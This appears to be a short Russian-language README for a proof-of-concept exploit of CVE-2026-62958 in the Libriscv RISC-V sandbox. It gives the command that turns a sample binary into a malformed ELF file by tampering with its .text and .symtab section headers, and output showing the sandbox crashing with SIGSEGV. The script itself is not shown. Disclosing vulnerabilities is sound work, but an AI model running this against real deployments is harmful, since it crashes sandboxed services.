
Доказательство концепции для CVE-2026-62958: создаёт повреждённый ELF-файл для запуска чтения за пределами буфера в Libriscv и аварийного завершения песочницы с ошибкой SIGSEGV.
Уязвимость в Libriscv позволяет атакующему вызвать крах песочницы с помощью чтения за пределами границ (Out of Bounds Read).
Чтобы создать Bad elf:
python3 poc.py samplefile poisoned_file
Результаты:
❯ python3 poc.py fib poisoned_file
Manipulating .text section header at offset 0x250
Manipulating .symtab section header at offset 0x710
❯ ./rvlinux poisoned_file
fish: Job 1, './rvlinux poisoned_file' terminated by signal SIGSEGV (Address boundary error)